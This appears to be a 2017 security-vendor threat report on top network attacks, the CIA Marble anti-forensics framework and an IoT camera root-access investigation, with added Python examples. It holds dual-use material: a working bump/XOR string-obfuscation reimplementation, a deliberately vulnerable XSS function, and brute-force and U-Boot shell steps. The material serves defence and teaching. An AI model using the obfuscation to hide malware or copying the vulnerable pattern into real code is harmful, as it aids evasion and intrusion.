To deliver malware, attackers must either rely on the mistakes of users, or take advantage of vulnerabilities found in network software. In the case of software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is designed to detect these client and server-side exploits, and prevent them from working. This section of the report highlights the top network attacks.

At a high level, our IPS service blocked 4,151,210 network attacks, which averages to 156 intrusion attempts per Firebox customer. This represents around a 37% increase in overall blocked network attacks this quarter compared to Q4. While cyber criminals may not have launched as many massive malware campaigns, it appears that other types of attacks are on the rise.

Below are the top network threats seen during this period.

Figure 7: Top Ten IPS Hits Q1 2017 (Share = percentage of the top ten hits)

 #  Threat Name                                                      Category                 Affected Products              CVE Number      Count    Share
 1  WEB URI Handler Buffer Overflow - POST -1                        Web Server               Windows web servers            CVE-2011-1965   532,565  40.6%
 2  WEB HTTP Basic Authorization Header Buffer Overflow              Web Server               All web servers                CVE-2009-0183   192,899  14.7%
 3  WEB Nginx HTTP_parse_chunked Buffer Overflow(1)                  Web Server               Nginx                          CVE-2013-2028   118,576   9.0%
 4  WEB HTTP Host Header Buffer Overflow                             Web Server               Apache                         CVE-2003-0245   117,706   9.0%
 5  WEB Cross-site Scripting -36                                     Web Client               Any web application            CVE-2011-2133   115,446   8.8%
 6  WEB Brute Force Login -1                                         Web Server               Web app logins                 n/a              68,806   5.3%
 7  WEB-CLIENT Javascript Obfuscation in EKs - 75                    Web Client               All web browsers               Multiple CVEs    49,376   3.8%
 8  WEB NetBSD tnftp fetch_url Command Execution(2)                  Web-based FTP            tnftp (Apple, NetBSD, Linux)   CVE-2014-8517    47,076   3.6%
 9  WEB-CLIENT Suspicious HTML Iframe Tag(4)                         Web Client               All web browsers               n/a              36,874   2.8%
10  Android libstagefright mp4 tx3g Atom Multiple Buffer Overflow -1  Android buffer overflow  Android OS                     CVE-2015-3824    31,085   2.4%

Rather than analyzing each individual exploit (see the links in the chart if you want more detail), let’s look at quarter-over-quarter differences and overall trends.


Quarter-Over-Quarter Attack Analysis

In Q1, six of the network attacks from the previous quarter return to our top list. At a high level, not much has changed with these six attacks. Almost all of them moved up the list, and they generally retain the same order. The only exception is the "Suspicious HTML iframe tag" signature, which dropped two spots to ninth. While web-based attacks still dominate the top threats, the scale has tipped from web client attacks to web server attacks, which we will talk about next.

The Web Battleground Shifts to Servers

Last quarter, web attacks dominated our top ten, filling every spot on the list. This quarter, web threats still dominate, but a mobile exploit cracked the top 10 for the first time. This quarter also saw a shift in the type of web attacks. In Q4 2016, 73% of the top web attacks targeted web clients (the browser and its supporting software), not web servers. Now, only three of the nine web threats on the list target web clients (the XSS, JavaScript obfuscation and suspicious iframe signatures), and, weighted by hit count, 82% of the top ten network attacks target web servers or web-based services.

This marks a significant shift in the mix of web server vs. client threats, and the trend extends into the top 20 as well. While a few more client vulnerabilities show up in the wider top 20 list, it also includes more web server flaws. We don't think drive-by download style attacks will go away, but it appears attackers have focused their efforts and tools on exploiting web server vulnerabilities. A couple of new web server attacks also made the list, which we'll cover next. With the increase in web server attacks, we recommend you harden your web servers, use a firewall to limit access to any internal web services, and keep your server software up to date with the latest patches.

Web Application Attacks Move Up

Though many of the web vulnerabilities in the top threat list remain the same, Q1 saw two newcomers: a web application vulnerability and a login brute force attack.

1. WEB Cross-site Scripting – 36: A web application (app) vulnerability is a flaw in the web app itself, not in the server software. This could include the code making up a common web framework you use, or the custom code you wrote for your own web apps. Common examples of web app flaws include cross-site scripting (XSS), local and remote file inclusion, SQL injection (SQLi), cross-site request forgery (CSRF), and many more.

Last quarter, not a single web app vulnerability made the top 10. This quarter, an XSS vulnerability rose to number five. An XSS flaw lets an attacker run their own script in a victim's browser in the context of the vulnerable site, so the script can act as that user and read whatever that user can see there. For reflected XSS, the attacker typically needs to trick you into clicking a specially crafted link; a stored XSS payload fires as soon as any user views the page it was planted in. If you do fall for the link, the attacker's script can read the web app's cookies (unless they are marked HttpOnly), submit requests as you, and read any of your other content on that site.

WEB Cross-site Scripting – 36 is one of many broad signatures that detect generic cross-site scripting attempts against your users. It's interesting to see web app attacks reach the top 10; we found three additional web app attacks in the top 20 as well. Protecting against XSS is a twofold process, since the vulnerability lies in a server-side web app but the attack targets a web client. If you administer or develop web apps, visit OWASP.org to learn how to build secure web apps (a broad topic we can't cover in a short report); the short version is to encode every piece of untrusted data for the context it is placed in (HTML body, attribute, JavaScript or URL) and to mark session cookies HttpOnly. If you are a web user, be very careful clicking unusual links.

2. WEB Brute Force Login – 1: While it doesn't technically catch a web app vulnerability, the Brute Force Login IPS rule does catch an attack that targets the login pages of web applications. If you don't build login throttling into your web application, attackers can use tools like THC Hydra or Burp Suite to brute force user accounts on your website. This IPS rule catches web login brute force attempts by looking for repeated connections from the same source address. Note what that heuristic misses: an attacker who spreads the attempts across many source addresses, or paces them slowly enough to stay under the threshold, will not trip it, so the rule complements rather than replaces throttling, lockout and multi-factor authentication on the login itself.

With the increase in web app vulnerabilities in Q1, we recommend web administrators audit their source code. As mentioned earlier, OWASP.org is a great resource for learning about protecting your web applications.
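As an added example (not code from the report), here is what the two newcomers look like from the defender's side in Python: the per-source failed-login count that the IPS heuristic relies on, run over constructed access-log lines; a server-side throttle of the kind the text says web apps should implement; and the reflected-XSS bug beside its output-encoding fix. The log format, the status-code meanings, the thresholds, the usernames and the `check` verifier are assumptions made for illustration.

```python
"""Added example, not from the WatchGuard report: login brute-force
detection and throttling, plus a reflected-XSS fix. Log lines,
thresholds and credentials below are constructed for illustration."""
import html
import re
from collections import defaultdict, deque

# Constructed access-log lines (combined-log shape). Assumption: a 401
# on POST /login is a failed attempt, a 302 is a successful login.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2017:10:00:01 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [01/Mar/2017:10:00:02 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [01/Mar/2017:10:00:02 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [01/Mar/2017:10:00:03 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [01/Mar/2017:10:00:04 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [01/Mar/2017:10:00:05 +0000] "POST /login HTTP/1.1" 401 512
198.51.100.9 - - [01/Mar/2017:10:00:05 +0000] "POST /login HTTP/1.1" 302 0
198.51.100.9 - - [01/Mar/2017:10:03:40 +0000] "GET /account HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def failed_logins_per_source(log_text, path="/login"):
    """Count failed POSTs to the login path per source address."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"] == path and m["status"] == "401":
            counts[m["ip"]] += 1
    return dict(counts)


def brute_force_sources(log_text, threshold=5):
    """Sources at or above `threshold` failures: the same repeated-source
    heuristic the IPS rule uses. Attempts spread over many addresses or
    paced below the threshold stay invisible to it."""
    return sorted(ip for ip, n in failed_logins_per_source(log_text).items()
                  if n >= threshold)


class LoginThrottle:
    """Server-side throttle: after `max_failures` failures for a username
    within `window` seconds, refuse further attempts until the oldest
    failure ages out. Keyed by username so a distributed attack on one
    account is still caught; key on (username, ip) instead if lockout
    abuse against legitimate users is the bigger concern."""

    def __init__(self, max_failures=5, window=300):
        self.max_failures = max_failures
        self.window = window
        self._failures = defaultdict(deque)

    def allowed(self, username, now):
        q = self._failures[username]
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) < self.max_failures

    def attempt(self, username, password, now, check):
        """Return 'locked', 'ok' or 'bad'. `check(user, pw)` is the real
        credential verifier; callers pass their own."""
        if not self.allowed(username, now):
            return "locked"
        if check(username, password):
            self._failures[username].clear()
            return "ok"
        self._failures[username].append(now)
        return "bad"


def render_greeting_vulnerable(name):
    """Reflected XSS: a query parameter lands in the page unencoded."""
    return "<p>Hello, %s</p>" % name


def render_greeting_fixed(name):
    """Encode for the HTML text context. Attribute, JavaScript and URL
    contexts each need their own encoder (see OWASP's XSS guidance)."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)
```

The count and the throttle answer different questions: the first tells you that an address is hammering the login, the second makes guessing unprofitable per account even when the attacker rotates addresses.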


StageFright Returns to the Spotlight

As previously mentioned, this quarter included the first mobile-specific exploit to crack the top threats list. StageFright is a set of vulnerabilities in Android mobile devices that first earned notoriety in 2015, when researchers publicly disclosed it ahead of the Black Hat security conference. Specifically, StageFright refers to buffer overflows in libstagefright, the Android media library responsible for parsing video and audio files, including the videos that arrive in MMS messages. By sending a carefully crafted video, an attacker can exploit one of these overflows to execute arbitrary code with the privileges of the mediaserver process that hosts the library, or at least cause the device to crash. The signature in our top ten, CVE-2015-3824, covers the overflow in the handling of the MP4 "tx3g" text-track atom. You can learn more about it in this Daily Byte video.

Over the course of 2015, Android vendors patched StageFright. However, not all users or vendors keep their Android installs up to date, so many mobile devices may remain vulnerable. Our StageFright signature catches some of the malicious MP4 files used to trigger this video-handling vulnerability. It's interesting to see this mobile threat make our top attack list. Nearly two years later, StageFright is not only still present, but prolific.

If you are worried about this mobile threat, we highly recommend upgrading your Android operating system (if it's not patched already). Barring that, some third-party texting applications can mitigate the risk of StageFright by preventing mobile devices from processing video messages automatically; these applications ask whether you want to download and play a video message, and turning off MMS auto-retrieve in the stock messaging app has the same effect. That removes the no-click delivery path but not the vulnerability, since a crafted file opened from a browser or email still reaches the same parser. You should train your users to treat all unsolicited video messages as suspicious, and avoid clicking links or downloading files you don't expect.

In summary, the web is still the battleground, but the conflict has shifted from client-side to server-side vulnerabilities. If you are a web administrator, use this as an excuse to circle back and reevaluate your security for web servers and applications.


Geographic Attack Distribution

The general regional attack trends we saw in Q4 2016 continued this quarter, with the majority of the top network attacks happening in EMEA. We did see marginally fewer attacks in APAC and more in the Americas, but overall, the regional split looks very much like the normalized one from our last report.

Besides the overall regional trend, our feed data also shows interesting country-specific nuances between the individual top attacks.

• 96% of suspicious iframes were detected in North America. The Suspicious HTML iframe threat overwhelmingly affected North America, with 96% of the hits falling in the U.S. and Canada. Iframes are legitimate HTML tags designed to embed one page inside another. However, web attacks often leverage malicious iframes (typically tiny or hidden ones injected into a compromised page) to pull content from a malicious site. If an attacker can hijack a legitimate website, they often use iframes to force that site's visitors to load another site hosting their web exploit kit (EK). We suspect these hits have to do with increased web attack campaigns in the U.S. and Canada.

• The top cross-site scripting (XSS) attack targeted Italy 90% of the time. We haven't attributed it to a specific campaign, but most XSS attacks in our top threat list affect victims in Italy.

• NGINX is a popular, open-source web and email proxy server. The NGINX vulnerability in our top 10 is an old but serious flaw from four years ago (CVE-2013-2028, a stack buffer overflow in the chunked transfer-encoding parser of nginx 1.3.9 through 1.4.0). While not as dominating as the examples above, 53% of the "NGINX HTTP_parse_chunked buffer overflow" detections come from Germany. The remaining hits are spread between 17 other countries.

• Likewise, 46% of "JavaScript Obfuscation in EKs" hits were found in the U.S. While that may not seem like an overwhelming majority, the remaining hits were spread thinly across 45 other countries.

• Finally, 73.6% of the tnftp attacks are split between Great Britain (42.6%) and Australia (31%). By the way, tnftp is a popular FTP client for BSD platforms (the table lists Apple because macOS shipped it as its ftp command). Though it is an FTP client, this vulnerability (CVE-2014-8517) involves its handling of HTTP URLs: when fetching over HTTP, a malicious server could supply a filename beginning with a pipe character, which tnftp handed to popen() and thereby executed as a command. We are not sure why attackers are primarily targeting Great Britain and Australia with these tnftp attacks. Other than sharing a mutual historical ancestry, these countries have little in common.

Figure 8: Malware detection by region (EMEA 63.3%, Americas 32%, APAC 4.7%)

Though some attacks are global, others target various countries differently, and you can learn a lot from this regional nuance. For instance, our data shows that if you live in North America, you should look out for web-based attacks and drive-by download campaigns that leverage malicious exploit kits. Meanwhile, if you're in Italy, beware of XSS attacks, and train your users to avoid clicking suspicious links. Finally, if you live in the UK or Australia, be sure you have updated tnftp.

• Malicious JavaScript primarily arrives in email. Like the previous quarter, we saw a significant amount of malicious JavaScript in Q1. JavaScript was designed for the web, so you might expect to encounter it more there. However, we saw more malicious JavaScript in email. Though attackers do exploit malicious JavaScript with their web-based EKs, 97.2% of the malicious JavaScript we saw arrived in email. These evil emails tend to include compressed Zip attachments, which hide malicious .JS files; on Windows, a double-clicked .js file runs through the Windows Script Host, outside the browser sandbox. As mentioned in the last report, this is a common delivery vector for ransomware like Locky.

• Linux malware is sent over the web. In our Malware Trends section, we mentioned that we saw a lot of Linux-based threats in Q1. These Linux threats were overwhelmingly delivered over the web (99.99%), with only eight of the 419,367 instances arriving via email or FTP. This makes sense if you think about how automated Linux and IoT bots work. As seen in the script sample in the Malware Trends section, many malicious Linux scripts simply use the "wget" command to grab other malicious tools over an everyday web connection.

• Brazilian banking attack sends malicious Java over email. Like JavaScript, Java is something you might expect to see more of over the web. However, 99.9% of the Java/Downloader malware arrived over email. As mentioned before, this attack occurred almost exclusively in Brazil, which suggests this malware is associated with a well-known attack campaign targeting Brazilian banks. The attackers behind that campaign send phishing emails that contain malicious .Jar files, sometimes directly attached to the email, but often compressed within a Zip file. The attackers use a malicious Java downloader because it allows them to target both PCs and Macs.

• The Bitcoin mining trojan was almost entirely delivered via FTP. As mentioned earlier, Generic36.AAVT is associated with Bitcoin mining trojans. This threat was the only malware to buck the trend and not get delivered over email or the web. It was almost exclusively FTP-based, with one exception out of 77,704 instances. We're not entirely sure why this is; however, many traditional bots did use FTP to download additional payloads. We theorize that this could be another threat adding a bitcoin miner to a victim's computer as a secondary payload.
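The two email-delivered families above share a delivery trick: an archive wrapping a script or a .jar. Here is an added example (not from the report) of the check a mail gateway can run on an attachment before any detonation: list the archive members and flag the ones the recipient's machine would execute on a double-click. The archives are constructed in memory with harmless stub contents, and the extension list is an assumption about what should count as executable.

```python
"""Added example, not from the WatchGuard report: flag Zip attachments
that carry script or Java payloads. Archives below are constructed."""
import io
import zipfile

# Extensions Windows or the JVM will run when opened from a mail client.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".jar", ".exe", ".scr", ".cmd", ".bat", ".ps1"}
NESTED_ARCHIVES = {".zip", ".rar", ".7z"}


def risky_members(zip_bytes):
    """Return (member, reason) for members a gateway should not pass.
    Only the *last* extension decides, so 'Invoice.pdf.js' is caught.
    Nested archives are reported too: member names are visible even in a
    password-protected Zip, but their contents cannot be inspected here."""
    risky = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.lower()
            ext = "." + name.rsplit(".", 1)[1] if "." in name else ""
            if ext in SCRIPT_EXTENSIONS:
                risky.append((info.filename, ext))
            elif ext in NESTED_ARCHIVES:
                risky.append((info.filename, "nested-archive"))
    return risky


def verdict(zip_bytes):
    return "block" if risky_members(zip_bytes) else "allow"


def build_zip(members):
    """Test helper: build an archive from {name: bytes} in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

Blocking on member names is cheap and catches the Locky-style `.pdf.js` lure and the Brazilian `.jar` drop without opening anything; it does not replace detonation of what the names do not reveal, such as macros inside an Office document.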

Firebox Feed Statistics: Defense Learnings

We've shared several small defensive tips throughout this section, but here are three defense strategies for some of the top-level trends identified by Q1's Firebox Feed data:

1. Harden your Linux servers and IoT devices. Three, if not four (if you include PERL/ShellBot), of the top ten Q1 malware variants target Linux systems. We suspect this increase comes from attackers launching automated attacks against weak IoT devices. Manufacturers focusing on usability and affordability over security have released a huge number of insecure IoT devices to the masses. Consumers with little security knowledge often connect these devices to the Internet without any firewall, allowing attackers easy access. Open Telnet and SSH combined with weak passwords allow attackers to quickly infect swaths of hosts. At the very least, we recommend you firewall your IoT devices and Linux servers from the Internet. Avoid opening access to command line interfaces without additional authentication or security mechanisms like a VPN. Change your default passwords, and update your software or firmware as often as possible.

2. The web battleground has shifted towards servers. In Q4, we saw many browser-based attacks. This quarter, we saw more web server attacks. Spend some time hardening your web servers, and don't forget any other services with web-based interfaces. Hardening servers involves locking down permissions, limiting resource exposure, and making sure the server's software is fully patched. You should also audit your web applications for programmatic vulnerabilities. Web application security is a complex topic, but we recommend you visit OWASP.org for a wealth of practical tips.

3. Traditional AV misses 38% of malware. For the second quarter in a row, we have seen our legacy AV solution miss a lot of malware that our more advanced solution can catch. In fact, the miss rate has gone up from 30% to 38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that it evades signature-based detection. If you want to block most malware, you need to deploy an advanced malware solution. These anti-malware solutions can often detect never-before-seen zero day malware using more proactive detection techniques, such as behavior analysis and machine learning. If you're a WatchGuard customer, APT Blocker catches the malware that traditional AV misses. If you don't have an advanced malware solution, you'll likely miss more than one third of the threats online.

Top Security Incidents

Every quarter, several major security stories make the headlines. Some of these stories involve well-known products or services, or simply have a major effect on the security of the overall industry. The media does a great job informing the public of these issues, but they don't always dig into, or research, the technical details.

Our goal with this section of the report is to introduce new research and technical detail that you didn't already hear from the news or other research sources. This quarter, we cover the Marble framework from the CIA Vault 7 leaks.

The CIA Vault 7 Leaks

On March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA) code-named "Vault 7." The initial leak included descriptions and details of the CIA's covert hacking program, including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone devices, smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux. While the leaks contained many details of ongoing CIA projects, WikiLeaks consciously held back actual source code and proof of concept (POC) exploits from the public, instead offering to share them with affected manufacturers for analysis.

Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the "Sonic Screwdriver," capable of bypassing EFI/UEFI protections on the target host to facilitate installation of the rootkit. Dark Matter also disclosed similar tools for infecting Apple's iOS mobile operating system, dating back to 2008.

For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing sensitive information does you no good if investigators can clearly trace the attack back to you. The act of investigating an attack and analyzing its artifacts is called computer forensics. On March 31, WikiLeaks continued their "Vault 7" leaks with the release of the CIA's anti-forensics tool, called the Marble framework. The leak included Marble's source code and user documentation.

A Technical Analysis of the Marble Framework

When malware authors write source code, they often include strings of text along with the regular computational instructions. Such strings can include file paths, Windows registry key names, and sometimes even hard-coded words or passwords. When they compile their source, these strings remain present in the executable, for anyone to find.

When analyzing malware, forensic investigators usually first check executables for any human-readable strings, which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific developer (i.e., the CIA).

The framework includes several modules with different purposes. The Mibster module looks for strings marked for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the source code back to its original state in the event of an error, or if manually requested by the malware author.

To understand the Marble framework, you must first understand how programming languages like C and C++ store strings of text. If you were developing a new ransomware variant, you would probably want to include a function that creates a text file with a ransom note on the victim's desktop. You might include the string of text "YOUR FILES ARE ENCRYPTED" inside this text file. In order for your ransomware to create that note, it would have to include that string of text in its source code.

C and C++ store string variables as an array of individual characters, terminated by a null byte (C++ also includes a variable data type specifically for strings, which we'll ignore).

Figure 9: String as character array storage example

Each character in the character array takes up 8 bits or 1 byte of memory, which is large enough to store any letter in the English alphabet. Other written languages, such as Cyrillic, require multiple bytes for each character. The wchar_t (wide character) data type allows C and C++ to use 16 bits or 2 bytes of storage for each character (on Windows; most Linux toolchains make wchar_t 4 bytes). To store the Russian string "шифровать" (roughly "encrypt" in English), we would use an array of wide characters.

Figure 10: String as wide-character array storage example

The Marble framework defines two new data types for string storage. The "CARBLE" data type is 1 byte long and matches up to the original "char" data type, while the "WARBLE" data type is 2 bytes long and matches up to the original "wchar_t" data type. Strings that are defined using the new CARBLE and WARBLE data types are obfuscated by the framework when the source code is compiled into an executable.

Figure 11: Marble framework new string storage data types

When using the Marble framework, a malware author first chooses which of the different obfuscation algorithms, or "Marbles" as the CIA calls them, they wish to use. The framework contains 106 different algorithms by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional algorithms.

After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project, and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfuscation by Mibster.


When the malware author compiles their code, Mibster chooses an obfuscation algorithm from the pool, and then notes all the source files containing the CARBLE and WARBLE data types. It creates a "gold copy" (an unmodified copy) of those files so it can safely revert to the originals in case of an error during obfuscation.

Next, Mibster parses these files, looking for strings that use the CARBLE and WARBLE data types. When it locates one, it scrambles the string using the chosen obfuscation algorithm. It replaces the original with the newly scrambled string plus a piece of de-obfuscation code. The de-obfuscation code allows the compiled executable (the malware) to recover the original string when it needs it.

After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its original (using the gold copy files).

In the end, the Marble framework scrambles all the human-readable strings within an executable, making it difficult for a forensic investigator to learn anything about the author from these strings. Note what it does not hide: each string is decoded in memory at the moment the program uses it, so a debugger, a memory dump, or a sandbox that logs API arguments still sees the plaintext.

Marble Obfuscation Algorithms

As for the obfuscation algorithms themselves, each algorithm generates a random key, whose size depends on the algorithm used.

Figure 12: Obfuscation random key generation

As Mibster feeds a string through the algorithm, it modifies each character using a character from the key. The modification either adds or subtracts the value of the key byte to or from the character being modified ("bumping"), or XORs the two (exclusive OR).

Figure 13: Obfuscation XOR algorithm

As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled executable to read an obfuscated string by returning it to its original state while the program is running. One other difference between the available algorithms is how they implement this de-obfuscation code. Some place the de-obfuscation code alongside the scrambled string as a computational loop; others call a separate function stored elsewhere in the executable.

Figure 14: De-obfuscation code generation
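To make the mechanics concrete, here is an added example (not Marble's own code, which rewrites C/C++ source at build time) that reproduces the scheme the report describes in Python: a random per-string key, a "bump" (add) or XOR of each byte with a key byte, and the decode step the executable runs when it needs the string, with a WARBLE-style variant for 2-byte characters. The key bytes, the mode names, the UTF-16/Latin-1 choice and the `printable_strings` helper are assumptions made for illustration.

```python
"""Added example, not code from the Marble framework: the bump/XOR string
obfuscation scheme described in the report, with the runtime decode step
and a strings(1)-style scan to show what an investigator would see."""
import os
import re


def make_key(length):
    """Random per-string key, as in Figure 12; real key sizes vary by Marble."""
    return os.urandom(length)


def obfuscate(text, key, mode="xor", wide=False):
    """Scramble `text` with `key`. `wide` emulates WARBLE (2 bytes per
    character, UTF-16LE here); otherwise CARBLE (1 byte, Latin-1 here)."""
    raw = text.encode("utf-16-le" if wide else "latin-1")
    out = bytearray()
    for i, b in enumerate(raw):
        k = key[i % len(key)]
        if mode == "xor":
            out.append(b ^ k)
        elif mode == "bump":
            out.append((b + k) & 0xFF)    # add the key byte, wrap at 256
        else:
            raise ValueError("unknown mode: %s" % mode)
    return bytes(out)


def deobfuscate(blob, key, mode="xor", wide=False):
    """The decode loop Mibster emits beside each scrambled string: the
    inverse of obfuscate(), run only when the program needs the value."""
    out = bytearray()
    for i, b in enumerate(blob):
        k = key[i % len(key)]
        out.append(b ^ k if mode == "xor" else (b - k) & 0xFF)
    return out.decode("utf-16-le" if wide else "latin-1")


def printable_strings(data, min_len=4):
    """What a strings(1)-style triage pass sees: runs of printable ASCII."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
```

Run `printable_strings` on the obfuscated bytes and the ransom note is gone; run it on what `deobfuscate` returns and it is back, which is why memory capture or API-argument logging beats static string triage against this kind of tool.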

Marble Framework Defense Learnings

The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal users. However, the average administrator can still draw a few defensive learnings from this example.

1. Obfuscation can also help malware hide from detection. There's a big difference between executable code obfuscation and anti-forensic string obfuscation. The Marble framework provides the latter, and doesn't really help malware evade detection; it just makes it harder for investigators to attribute the malware. That said, this incident reminds us that criminal attackers use code obfuscation in a similar way to hide malware from antivirus (AV) software. Signature-based AV solutions looking for certain code patterns won't find them if the code is obfuscated. This highlights the necessity for more advanced malware detection solutions, such as behavior-based sandboxes, to detect obfuscated malware.

2. Beware of false flag attacks in nation-state attacks. The user documentation released in the Vault 7 leak confirms that the Marble obfuscation tools support foreign languages. This suggests that the CIA could leverage this tool to obfuscate their malware to appear as if it comes from another country, something experts call a false flag attack. While there is no direct evidence that the CIA used Marble in this way, you should be aware of the possibility.

3. Expect false flags to trickle down to criminal malware. More importantly, be aware that the release of the Marble framework now enables even unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed to the CIA. Malware authors could even backdate the compile timestamp (a single field in the PE header) to make their malware appear as though it was created before the public release of the framework. We expect some criminal malware to start using string obfuscation to throw off investigators.

WatchGuard Threat Lab's IoT Research Project

In response to the rapid spread of the Mirai botnet, and the perceived general insecurity of new consumer IoT devices, WatchGuard's Threat Lab launched an ongoing project to analyze various IoT devices for security flaws. Some of our test targets included Wi-Fi cameras, fitness accessories, and even a wireless egg tray. Any security flaws our researchers find are responsibly disclosed to device manufacturers for patching. Furthermore, we wait 90 days before full disclosure in the event that vendors don't respond to our disclosure notice.

In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher's disclosure, we had to wait the full 90 days before sharing these details.

Responsible Disclosure: Ouvis C2 HD Security Camera

As a part of our ongoing IoT vulnerability research project, one of the recently tested devices was the Ouvis C2 HD Wireless Security Camera. This is a wireless camera that includes Android, iOS and browser-based remote viewing.

Open Telnet Access

When first examining new network devices for vulnerabilities, researchers typically start by port scanning the device to identify any open services.

Figure 15: nmap port scan output


A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81, a non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability, since Telnet offers no encryption: credentials and every command cross the network in the clear. There is no reason for consumer IoT devices to allow Telnet-based management access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because of open Telnet access combined with weak default passphrases.

After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and password for the 'root' account on the device. Since these CLI interfaces are often left in for diagnostic purposes, manufacturers don't share credentials for them, and don't necessarily intend them for the customer's use.

Brute forcing to the rescue. With respect to authentication, a brute force attack is the act of rapidly trying different username and password combinations against a login. Using an application called THC Hydra, our researcher attempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist containing thousands of common passphrases. After several hours of trying different username and password combinations, Hydra was unable to find working credentials.

After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root access. The next step involved disassembling the camera in search of serial console access. Luckily, one of the circuit boards in the camera had UART pads.

Figure 16: hydra password brute force via

Figure 17: Empty UART pads


After soldering a USB-to-TTL UART cable to the empty pads, the team could access the camera's serial console (115200 baud).

Figure 18: Camera U-Boot output

Figure 19: Modifying the U-Boot configuration

Figure 20: Hashed root password

After halting the boot process, our researcher modified the U-Boot configuration to start a shell after mounting the filesystem (the usual trick is to append init=/bin/sh to the kernel's bootargs so the kernel runs a shell instead of the normal init).

Our researcher was finally greeted with a command line shell for the camera. Once connected, he checked /etc/passwd for any user accounts and easily found the root account and its hashed password (older embedded Linux builds keep the hash in /etc/passwd itself rather than in a separate /etc/shadow).

Summary


Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield any results.

We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password (which some might call a backdoor account). The good news is that the root password has withstood several significant cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password. That said, if anyone ever recovers this password, it could provide a backdoor into all these devices. In fact, we have since correlated with other researchers' analysis, and have confirmed that all these Ouvis cameras share the same root password hash. If the password ever leaks, it will provide attackers with unrestricted access to every one of these devices, and because the hash is identical across units, cracking it once (or extracting it from one firmware image) is enough.
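The manual /etc/passwd check above, and the later finding that every unit shares one root hash, can be scripted when you have several firmware images to triage. This added example (not the researchers' tooling) parses passwd and optional shadow contents, reports which accounts can actually log in and which crypt(3) scheme protects them (which is what decides the hashcat mode), and lists hashes reused across images. The passwd lines, image names and hash values are constructed; the real Ouvis hash is not reproduced.

```python
"""Added example, not from the WatchGuard report: triage of /etc/passwd
and /etc/shadow pulled from firmware images. All inputs are constructed."""
from collections import defaultdict

# crypt(3) prefix -> scheme; the prefix tells you what to feed hashcat.
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$y$": "yescrypt"}


def identify_scheme(hash_field):
    for prefix, name in HASH_PREFIXES.items():
        if hash_field.startswith(prefix):
            return name
    if len(hash_field) == 13 and "$" not in hash_field:
        return "descrypt"          # traditional DES, 2-char salt + 11 chars
    return "unknown"


def login_accounts(passwd_text, shadow_text=None):
    """Accounts that can log in: a hash (or no password at all) and not
    locked. Old embedded builds keep the hash in passwd; when passwd shows
    'x' the hash comes from shadow. Returns {user: (uid, shell, hash, scheme)}."""
    shadow = {}
    for line in (shadow_text or "").splitlines():
        parts = line.split(":")
        if len(parts) >= 2:
            shadow[parts[0]] = parts[1]
    result = {}
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        user, pw, uid, _gid, _gecos, _home, shell = parts[:7]
        if pw == "x":
            pw = shadow.get(user, "*")   # no shadow entry: treat as locked
        if pw == "*" or pw.startswith("!"):
            continue                     # locked account
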